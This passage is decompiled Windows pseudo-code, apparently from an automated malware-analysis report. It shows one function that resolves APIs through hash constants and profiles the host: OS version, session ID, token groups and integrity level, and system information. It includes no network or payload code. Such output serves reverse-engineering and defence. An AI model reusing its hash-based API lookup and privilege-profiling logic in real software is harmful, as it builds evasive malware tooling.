                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t155;
                                                                                                                                                  				signed char* _t159;
                                                                                                                                                  				char _t162;
                                                                                                                                                  				void* _t180;
                                                                                                                                                  				intOrPtr _t189;
                                                                                                                                                  				char _t190;
                                                                                                                                                  				intOrPtr _t196;
                                                                                                                                                  				intOrPtr _t200;
                                                                                                                                                  				void* _t203;
                                                                                                                                                  				void* _t212;
                                                                                                                                                  				void* _t213;
                                                                                                                                                  				void* _t215;
                                                                                                                                                  				void* _t216;
                                                                                                                                                  				void* _t223;
                                                                                                                                                  				void* _t238;
                                                                                                                                                  				void* _t241;
                                                                                                                                                  				void* _t244;
                                                                                                                                                  				void* _t247;
                                                                                                                                                  				void* _t250;
                                                                                                                                                  				void* _t254;
                                                                                                                                                  				void* _t259;
                                                                                                                                                  				void* _t265;
                                                                                                                                                  				void* _t268;
                                                                                                                                                  				int _t271;
                                                                                                                                                  				void* _t272;
                                                                                                                                                  				void* _t276;
                                                                                                                                                  				void* _t277;
                                                                                                                                                  				void* _t278;
                                                                                                                                                  				void* _t282;
                                                                                                                                                  				int _t288;
                                                                                                                                                  				intOrPtr* _t291;
                                                                                                                                                  				signed char _t294;
                                                                                                                                                  				signed char _t295;
                                                                                                                                                  				intOrPtr* _t320;
                                                                                                                                                  				intOrPtr* _t325;
                                                                                                                                                  				intOrPtr* _t363;
                                                                                                                                                  				char _t364;
                                                                                                                                                  				intOrPtr* _t372;
                                                                                                                                                  				void* _t377;
                                                                                                                                                  				void* _t382;
                                                                                                                                                  				void* _t383;
                                                                                                                                                  				void* _t384;
                                                                                                                                                  				void* _t385;
                                                                                                                                                  				void* _t386;
                                                                                                                                                  				void* _t387;
                                                                                                                                                  				void* _t393;
                                                                                                                                                  				void* _t395;
                                                                                                                                                  				void* _t401;
                                                                                                                                                  				void* _t403;
                                                                                                                                                  				intOrPtr* _t404;
                                                                                                                                                  				signed int _t406;
                                                                                                                                                  				intOrPtr* _t409;
                                                                                                                                                  				void* _t411;
                                                                                                                                                  				signed int _t413;
                                                                                                                                                  				void* _t414;
                                                                                                                                                  				void* _t415;
                                                                                                                                                  				void* _t420;
                                                                                                                                                  				intOrPtr* _t423;
                                                                                                                                                  				void* _t425;
                                                                                                                                                  				void** _t427;
                                                                                                                                                  				void* _t428;
                                                                                                                                                  				void* _t429;
                                                                                                                                                  
                                                                                                                                                  				_t414 = __ecx;
                                                                                                                                                  				_t155 =  *0x6e9bd1f8;
                                                                                                                                                  				if(_t155 == 0x4c71e88d) {
                                                                                                                                                  					_t155 = E6E9B361C(0x30);
                                                                                                                                                  					 *0x6e9bd1f8 = _t155;
                                                                                                                                                  				}
                                                                                                                                                  				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
                                                                                                                                                  					_t415 = _t428 + 0x48;
                                                                                                                                                  					E6E9B3698(_t415, 0, 0x11c);
                                                                                                                                                  					_t429 = _t428 + 0xc;
                                                                                                                                                  					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
                                                                                                                                                  					if(E6E9B306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
                                                                                                                                                  						_push(_t415);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  					}
                                                                                                                                                  					_t404 =  *0x6e9bd1f8;
                                                                                                                                                  					_t159 = _t429 + 0x4c;
                                                                                                                                                  					_t294 =  *_t159;
                                                                                                                                                  					 *(_t404 + 8) = _t294;
                                                                                                                                                  					_t295 = _t159[4];
                                                                                                                                                  					 *(_t404 + 9) = _t295;
                                                                                                                                                  					 *((char*)(_t404 + 0xa)) = _t159[0x110];
                                                                                                                                                  					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
                                                                                                                                                  					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
                                                                                                                                                  					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
                                                                                                                                                  					_t162 = E6E9B0FF8(_t404);
                                                                                                                                                  					 *(_t429 + 0x198) = 0;
                                                                                                                                                  					 *((char*)( *0x6e9bd1f8 + 0xb)) = _t162;
                                                                                                                                                  					_t363 = E6E9B306C(0x150c05fc, 0x1da4d409, _t162, _t162);
                                                                                                                                                  					if(_t363 == 0) {
                                                                                                                                                  						L12:
                                                                                                                                                  						_t364 = 0;
                                                                                                                                                  						L13:
                                                                                                                                                  						 *((char*)( *0x6e9bd1f8 + 0x28)) = _t364;
                                                                                                                                                  						if( *((intOrPtr*)(E6E9B0730(0))) >= 0x10) {
                                                                                                                                                  							_push(6);
                                                                                                                                                  							memcpy(_t429 + 0x164, 0x6e9bbce0, 0 << 2);
                                                                                                                                                  							_t429 = _t429 + 0xc;
                                                                                                                                                  							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
                                                                                                                                                  							E6E9AF584(_t429 + 0x24, 0);
                                                                                                                                                  							_t406 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							do {
                                                                                                                                                  								E6E9AF828(_t429 + 0x24, E6E9AF4CC(_t429 + 0x20) + 4);
                                                                                                                                                  								 *((intOrPtr*)(E6E9AF4BC(_t429 + 0x24, E6E9AF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
                                                                                                                                                  								_t406 = _t406 + 1;
                                                                                                                                                  								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
                                                                                                                                                  								__eflags = _t406 - 6;
                                                                                                                                                  							} while (_t406 < 6);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							E6E9B5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
                                                                                                                                                  							E6E9AF654(_t429 + 0x20);
                                                                                                                                                  							E6E9B55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
                                                                                                                                                  							_t180 = E6E9B5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
                                                                                                                                                  							_t407 = _t180;
                                                                                                                                                  							E6E9ADFA4(_t429 + 0x1c0);
                                                                                                                                                  							__eflags = _t180;
                                                                                                                                                  							if(_t180 != 0) {
                                                                                                                                                  								E6E9B55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
                                                                                                                                                  								_t420 = E6E9B5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
                                                                                                                                                  								E6E9ADFA4(_t429 + 0x1c8);
                                                                                                                                                  								_t407 = _t429 + 0x1d0;
                                                                                                                                                  								E6E9B55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
                                                                                                                                                  								_t401 = E6E9B5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
                                                                                                                                                  								E6E9ADFA4(_t429 + 0x1d0);
                                                                                                                                                  								__eflags = _t420;
                                                                                                                                                  								if(_t420 != 0) {
                                                                                                                                                  									__eflags = _t420 - 5;
                                                                                                                                                  									if(_t420 != 5) {
                                                                                                                                                  										__eflags = _t420 - 2;
                                                                                                                                                  										if(_t420 != 2) {
                                                                                                                                                  											L58:
                                                                                                                                                  											E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  											__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  											if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  												L65:
                                                                                                                                                  												_t189 = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												 *(_t429 + 4) = 0;
                                                                                                                                                  												goto L66;
                                                                                                                                                  											}
                                                                                                                                                  											_t382 =  *(_t429 + 4);
                                                                                                                                                  											__eflags = _t382;
                                                                                                                                                  											if(_t382 == 0) {
                                                                                                                                                  												L61:
                                                                                                                                                  												_t238 = 1;
                                                                                                                                                  												L63:
                                                                                                                                                  												__eflags = _t238;
                                                                                                                                                  												if(_t238 == 0) {
                                                                                                                                                  													E6E9B5558(_t382);
                                                                                                                                                  												}
                                                                                                                                                  												goto L65;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _t382 - 0xffffffff;
                                                                                                                                                  											if(_t382 != 0xffffffff) {
                                                                                                                                                  												_t238 = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												goto L63;
                                                                                                                                                  											}
                                                                                                                                                  											goto L61;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t401 - 1;
                                                                                                                                                  										if(_t401 != 1) {
                                                                                                                                                  											goto L58;
                                                                                                                                                  										}
                                                                                                                                                  										E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  										__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  										if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  											L57:
                                                                                                                                                  											 *(_t429 + 4) = 0;
                                                                                                                                                  											_t189 = 5;
                                                                                                                                                  											goto L66;
                                                                                                                                                  										}
                                                                                                                                                  										_t383 =  *(_t429 + 4);
                                                                                                                                                  										__eflags = _t383;
                                                                                                                                                  										if(_t383 == 0) {
                                                                                                                                                  											L53:
                                                                                                                                                  											_t241 = 1;
                                                                                                                                                  											L55:
                                                                                                                                                  											__eflags = _t241;
                                                                                                                                                  											if(_t241 == 0) {
                                                                                                                                                  												E6E9B5558(_t383);
                                                                                                                                                  											}
                                                                                                                                                  											goto L57;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t383 - 0xffffffff;
                                                                                                                                                  										if(_t383 != 0xffffffff) {
                                                                                                                                                  											_t241 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											goto L55;
                                                                                                                                                  										}
                                                                                                                                                  										goto L53;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t401;
                                                                                                                                                  									if(_t401 != 0) {
                                                                                                                                                  										__eflags = _t401 - 1;
                                                                                                                                                  										if(_t401 == 1) {
                                                                                                                                                  											E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  											__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  											if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  												L121:
                                                                                                                                                  												 *(_t429 + 4) = 0;
                                                                                                                                                  												_t189 = 4;
                                                                                                                                                  												goto L66;
                                                                                                                                                  											}
                                                                                                                                                  											_t384 =  *(_t429 + 4);
                                                                                                                                                  											__eflags = _t384;
                                                                                                                                                  											if(_t384 == 0) {
                                                                                                                                                  												L117:
                                                                                                                                                  												_t244 = 1;
                                                                                                                                                  												L119:
                                                                                                                                                  												__eflags = _t244;
                                                                                                                                                  												if(_t244 == 0) {
                                                                                                                                                  													E6E9B5558(_t384);
                                                                                                                                                  												}
                                                                                                                                                  												goto L121;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _t384 - 0xffffffff;
                                                                                                                                                  											if(_t384 != 0xffffffff) {
                                                                                                                                                  												_t244 = 0;
                                                                                                                                                  												__eflags = 0;
                                                                                                                                                  												goto L119;
                                                                                                                                                  											}
                                                                                                                                                  											goto L117;
                                                                                                                                                  										}
                                                                                                                                                  										goto L58;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  									__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  									if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  										L45:
                                                                                                                                                  										 *(_t429 + 4) = 0;
                                                                                                                                                  										_t189 = 3;
                                                                                                                                                  										goto L66;
                                                                                                                                                  									}
                                                                                                                                                  									_t385 =  *(_t429 + 4);
                                                                                                                                                  									__eflags = _t385;
                                                                                                                                                  									if(_t385 == 0) {
                                                                                                                                                  										L41:
                                                                                                                                                  										_t247 = 1;
                                                                                                                                                  										L43:
                                                                                                                                                  										__eflags = _t247;
                                                                                                                                                  										if(_t247 == 0) {
                                                                                                                                                  											E6E9B5558(_t385);
                                                                                                                                                  										}
                                                                                                                                                  										goto L45;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t385 - 0xffffffff;
                                                                                                                                                  									if(_t385 != 0xffffffff) {
                                                                                                                                                  										_t247 = 0;
                                                                                                                                                  										__eflags = 0;
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									goto L41;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t401;
                                                                                                                                                  								if(_t401 != 0) {
                                                                                                                                                  									goto L58;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  								__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  								if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  									L35:
                                                                                                                                                  									 *(_t429 + 4) = 0;
                                                                                                                                                  									_t189 = 2;
                                                                                                                                                  									goto L66;
                                                                                                                                                  								}
                                                                                                                                                  								_t386 =  *(_t429 + 4);
                                                                                                                                                  								__eflags = _t386;
                                                                                                                                                  								if(_t386 == 0) {
                                                                                                                                                  									L31:
                                                                                                                                                  									_t250 = 1;
                                                                                                                                                  									L33:
                                                                                                                                                  									__eflags = _t250;
                                                                                                                                                  									if(_t250 == 0) {
                                                                                                                                                  										E6E9B5558(_t386);
                                                                                                                                                  									}
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t386 - 0xffffffff;
                                                                                                                                                  								if(_t386 != 0xffffffff) {
                                                                                                                                                  									_t250 = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									goto L33;
                                                                                                                                                  								}
                                                                                                                                                  								goto L31;
                                                                                                                                                  							}
                                                                                                                                                  							E6E9ACFDC(_t429 + 0xc);
                                                                                                                                                  							__eflags =  *((char*)(_t429 + 8));
                                                                                                                                                  							if( *((char*)(_t429 + 8)) == 0) {
                                                                                                                                                  								L25:
                                                                                                                                                  								 *(_t429 + 4) = 0;
                                                                                                                                                  								_t189 = 1;
                                                                                                                                                  								goto L66;
                                                                                                                                                  							}
                                                                                                                                                  							_t387 =  *(_t429 + 4);
                                                                                                                                                  							__eflags = _t387;
                                                                                                                                                  							if(_t387 == 0) {
                                                                                                                                                  								L21:
                                                                                                                                                  								_t254 = 1;
                                                                                                                                                  								L23:
                                                                                                                                                  								__eflags = _t254;
                                                                                                                                                  								if(_t254 == 0) {
                                                                                                                                                  									E6E9B5558(_t387);
                                                                                                                                                  								}
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t387 - 0xffffffff;
                                                                                                                                                  							if(_t387 != 0xffffffff) {
                                                                                                                                                  								_t254 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								goto L23;
                                                                                                                                                  							}
                                                                                                                                                  							goto L21;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t189 = 1;
                                                                                                                                                  							L66:
                                                                                                                                                  							 *((intOrPtr*)( *0x6e9bd1f8 + 0x24)) = _t189;
                                                                                                                                                  							_t190 = E6E9B1030(0xffffffffffffffff);
                                                                                                                                                  							_t320 =  *0x6e9bd1f8;
                                                                                                                                                  							 *((char*)(_t320 + 0x29)) = _t190;
                                                                                                                                                  							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
                                                                                                                                                  							if( *_t320 >= 0x10) {
                                                                                                                                                  								__eflags = 0xffffffffffffffff;
                                                                                                                                                  								 *((intOrPtr*)( *0x6e9bd1f8 + 0x2c)) = E6E9B10A4(0xffffffffffffffff);
                                                                                                                                                  								L78:
                                                                                                                                                  								if(E6E9B306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
                                                                                                                                                  									GetSystemInfo(_t429 + 0x164); // executed
                                                                                                                                                  								}
                                                                                                                                                  								_t196 =  *0x6e9bd1f8;
                                                                                                                                                  								_t291 = _t429 + 0x178;
                                                                                                                                                  								_t409 = _t429 + 0x170;
                                                                                                                                                  								 *((short*)(_t196 + 0xe)) =  *_t291;
                                                                                                                                                  								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
                                                                                                                                                  								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
                                                                                                                                                  								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
                                                                                                                                                  								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
                                                                                                                                                  								return _t196;
                                                                                                                                                  							}
                                                                                                                                                  							 *(_t429 + 0x19c) = 0;
                                                                                                                                                  							_t372 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  							if(_t372 == 0) {
                                                                                                                                                  								L74:
                                                                                                                                                  								_t200 =  *0x6e9bd1f8;
                                                                                                                                                  								if( *((char*)(_t200 + 0x28)) == 0) {
                                                                                                                                                  									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
                                                                                                                                                  								} else {
                                                                                                                                                  									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
                                                                                                                                                  								}
                                                                                                                                                  								goto L78;
                                                                                                                                                  							}
                                                                                                                                                  							_push(_t429 + 0x19c);
                                                                                                                                                  							_push(8);
                                                                                                                                                  							_push(0xffffffff);
                                                                                                                                                  							if( *_t372() == 0) {
                                                                                                                                                  								_t203 = E6E9B35F0(_t407);
                                                                                                                                                  								__eflags = _t203;
                                                                                                                                                  								if(_t203 != 0) {
                                                                                                                                                  									goto L74;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
                                                                                                                                                  							 *((char*)(_t429 + 0x34)) = 1;
                                                                                                                                                  							 *(_t429 + 0x1a4) = 0;
                                                                                                                                                  							_t325 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  							if(_t325 != 0) {
                                                                                                                                                  								_push(_t429 + 0x1a4);
                                                                                                                                                  								_push(0);
                                                                                                                                                  								_push(0);
                                                                                                                                                  								_push(1);
                                                                                                                                                  								_push( *(_t429 + 0x1ac));
                                                                                                                                                  								if( *_t325() == 0) {
                                                                                                                                                  									E6E9B35F0(_t407);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_t206 =  *(_t429 + 0x1a4);
                                                                                                                                                  							if( *(_t429 + 0x1a4) != 0) {
                                                                                                                                                  								E6E9AF584(_t429 + 0x18c, _t206);
                                                                                                                                                  								_t411 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  								__eflags = _t411;
                                                                                                                                                  								if(_t411 == 0) {
                                                                                                                                                  									L133:
                                                                                                                                                  									E6E9AF654(_t429 + 0x188);
                                                                                                                                                  									goto L72;
                                                                                                                                                  								}
                                                                                                                                                  								_t212 = E6E9AF4BC(_t429 + 0x18c, 0);
                                                                                                                                                  								_t213 = E6E9AF4CC(_t429 + 0x188);
                                                                                                                                                  								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
                                                                                                                                                  								__eflags = _t215;
                                                                                                                                                  								if(_t215 == 0) {
                                                                                                                                                  									_t216 = E6E9B35F0(_t411);
                                                                                                                                                  									__eflags = _t216;
                                                                                                                                                  									if(_t216 != 0) {
                                                                                                                                                  										goto L133;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t423 = E6E9AF4BC(_t429 + 0x18c, 0);
                                                                                                                                                  								E6E9ADF4C(_t429 + 0x1b4, 0);
                                                                                                                                                  								 *(_t429 + 0x1ac) = 0;
                                                                                                                                                  								_t377 = E6E9B306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  								__eflags = _t377;
                                                                                                                                                  								if(_t377 != 0) {
                                                                                                                                                  									 *_t377( *_t423, _t429 + 0x1ac);
                                                                                                                                                  								}
                                                                                                                                                  								E6E9ADFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
                                                                                                                                                  								_t223 = E6E9B306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
                                                                                                                                                  								__eflags = _t223;
                                                                                                                                                  								if(_t223 != 0) {
                                                                                                                                                  									_push( *(_t429 + 0x1ac));
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									asm("int3");
                                                                                                                                                  								}
                                                                                                                                                  								E6E9AE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
                                                                                                                                                  								_t425 = E6E9B4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E9AE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
                                                                                                                                                  								E6E9ADFA4(_t429 + 0x1b8);
                                                                                                                                                  								E6E9ADFA4(_t429 + 0x1b0);
                                                                                                                                                  								E6E9AF654(_t429 + 0x188);
                                                                                                                                                  								__eflags =  *((char*)(_t429 + 0x34));
                                                                                                                                                  								if( *((char*)(_t429 + 0x34)) != 0) {
                                                                                                                                                  									E6E9ABB44(_t429 + 0x30);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t425 - 0x6df4cf7;
                                                                                                                                                  								if(_t425 != 0x6df4cf7) {
                                                                                                                                                  									goto L74;
                                                                                                                                                  								} else {
                                                                                                                                                  									 *((intOrPtr*)( *0x6e9bd1f8 + 0x2c)) = 6;
                                                                                                                                                  									goto L78;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								L72:
                                                                                                                                                  								if( *((char*)(_t429 + 0x34)) != 0) {
                                                                                                                                                  									E6E9ABB44(_t429 + 0x30);
                                                                                                                                                  								}
                                                                                                                                                  								goto L74;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t429 + 0x198);
                                                                                                                                                  					_push(8);
                                                                                                                                                  					_push(0xffffffff);
                                                                                                                                                  					if( *_t363() == 0) {
                                                                                                                                                  						_t259 = E6E9B35F0(_t404);
                                                                                                                                                  						__eflags = _t259;
                                                                                                                                                  						if(_t259 != 0) {
                                                                                                                                                  							goto L12;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					 *(_t429 + 0x14) =  *(_t429 + 0x198);
                                                                                                                                                  					 *((char*)(_t429 + 0x18)) = 1;
                                                                                                                                                  					 *(_t429 + 0x1a0) = 0;
                                                                                                                                                  					if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
                                                                                                                                                  						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
                                                                                                                                                  						if(_t288 == 0) {
                                                                                                                                                  							E6E9B35F0(_t404);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t262 =  *(_t429 + 0x1a0);
                                                                                                                                                  					if( *(_t429 + 0x1a0) != 0) {
                                                                                                                                                  						E6E9AF584(_t429 + 0x3c, _t262);
                                                                                                                                                  						_t265 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  						_t407 = _t265;
                                                                                                                                                  						__eflags = _t265;
                                                                                                                                                  						if(_t265 == 0) {
                                                                                                                                                  							L107:
                                                                                                                                                  							E6E9AF654(_t429 + 0x38);
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						_t268 = E6E9AF4BC(_t429 + 0x3c, 0);
                                                                                                                                                  						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E9AF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
                                                                                                                                                  						__eflags = _t271;
                                                                                                                                                  						if(_t271 == 0) {
                                                                                                                                                  							_t272 = E6E9B35F0(_t407);
                                                                                                                                                  							__eflags = _t272;
                                                                                                                                                  							if(_t272 != 0) {
                                                                                                                                                  								goto L107;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t427 = E6E9AF4BC(_t429 + 0x3c, 0);
                                                                                                                                                  						 *(_t429 + 0x1d8 - 0x30) = 0;
                                                                                                                                                  						asm("movsd");
                                                                                                                                                  						asm("movsb");
                                                                                                                                                  						asm("movsb");
                                                                                                                                                  						_t407 = E6E9B306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  						__eflags = _t407;
                                                                                                                                                  						if(_t407 == 0) {
                                                                                                                                                  							goto L107;
                                                                                                                                                  						}
                                                                                                                                                  						_t276 = _t429 + 0x1a8;
                                                                                                                                                  						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
                                                                                                                                                  						__eflags = _t277;
                                                                                                                                                  						if(_t277 == 0) {
                                                                                                                                                  							_t278 = E6E9B35F0(_t407);
                                                                                                                                                  							__eflags = _t278;
                                                                                                                                                  							if(_t278 != 0) {
                                                                                                                                                  								goto L107;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t403 =  *(_t429 + 0x1a8);
                                                                                                                                                  						__eflags =  *_t427;
                                                                                                                                                  						if( *_t427 <= 0) {
                                                                                                                                                  							L101:
                                                                                                                                                  							__eflags = _t403;
                                                                                                                                                  							if(_t403 == 0) {
                                                                                                                                                  								L103:
                                                                                                                                                  								_t393 = 1;
                                                                                                                                                  								L105:
                                                                                                                                                  								__eflags = _t393;
                                                                                                                                                  								if(_t393 == 0) {
                                                                                                                                                  									E6E9B0FD4(_t403, _t407, _t403);
                                                                                                                                                  								}
                                                                                                                                                  								goto L107;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t403 - 0xffffffff;
                                                                                                                                                  							if(_t403 != 0xffffffff) {
                                                                                                                                                  								_t393 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								goto L105;
                                                                                                                                                  							}
                                                                                                                                                  							goto L103;
                                                                                                                                                  						}
                                                                                                                                                  						_t413 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t282 = E6E9B306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  							__eflags = _t282;
                                                                                                                                                  							if(_t282 == 0) {
                                                                                                                                                  								goto L100;
                                                                                                                                                  							}
                                                                                                                                                  							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
                                                                                                                                                  							_push( *(_t429 + 0x1ac));
                                                                                                                                                  							asm("int3");
                                                                                                                                                  							asm("int3");
                                                                                                                                                  							__eflags = _t282;
                                                                                                                                                  							if(_t282 == 0) {
                                                                                                                                                  								goto L100;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t403;
                                                                                                                                                  							if(_t403 == 0) {
                                                                                                                                                  								L93:
                                                                                                                                                  								_t395 = 1;
                                                                                                                                                  								L95:
                                                                                                                                                  								__eflags = _t395;
                                                                                                                                                  								if(_t395 == 0) {
                                                                                                                                                  									E6E9B0FD4(_t403, _t413, _t403);
                                                                                                                                                  								}
                                                                                                                                                  								E6E9AF654(_t429 + 0x38);
                                                                                                                                                  								__eflags =  *((char*)(_t429 + 0x18));
                                                                                                                                                  								if( *((char*)(_t429 + 0x18)) != 0) {
                                                                                                                                                  									E6E9ABB44(_t429 + 0x14);
                                                                                                                                                  								}
                                                                                                                                                  								_t364 = 1;
                                                                                                                                                  								goto L13;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t403 - 0xffffffff;
                                                                                                                                                  							if(_t403 != 0xffffffff) {
                                                                                                                                                  								_t395 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								goto L95;
                                                                                                                                                  							}
                                                                                                                                                  							goto L93;
                                                                                                                                                  							L100:
                                                                                                                                                  							_t413 = _t413 + 1;
                                                                                                                                                  							__eflags = _t413 -  *_t427;
                                                                                                                                                  						} while (_t413 <  *_t427);
                                                                                                                                                  						goto L101;
                                                                                                                                                  					}
                                                                                                                                                  					L10:
                                                                                                                                                  					if( *((char*)(_t429 + 0x18)) != 0) {
                                                                                                                                                  						E6E9ABB44(_t429 + 0x14);
                                                                                                                                                  					}
                                                                                                                                                  					goto L12;
                                                                                                                                                  				} else {
                                                                                                                                                  					return _t155;
                                                                                                                                                  				}
                                                                                                                                                  			}

                                                                                                                                                  0x6e9b0e08
                                                                                                                                                  0x6e9b0e0b
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a88
                                                                                                                                                  0x6e9b0a46
                                                                                                                                                  0x6e9b0a4b
                                                                                                                                                  0x6e9b0a50
                                                                                                                                                  0x6e9b0a6f
                                                                                                                                                  0x6e9b0a6f
                                                                                                                                                  0x6e9b0a79
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a79
                                                                                                                                                  0x6e9b0a52
                                                                                                                                                  0x6e9b0a56
                                                                                                                                                  0x6e9b0a58
                                                                                                                                                  0x6e9b0a5f
                                                                                                                                                  0x6e9b0a5f
                                                                                                                                                  0x6e9b0a65
                                                                                                                                                  0x6e9b0a65
                                                                                                                                                  0x6e9b0a67
                                                                                                                                                  0x6e9b0a6a
                                                                                                                                                  0x6e9b0a6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a67
                                                                                                                                                  0x6e9b0a5a
                                                                                                                                                  0x6e9b0a5d
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a5d
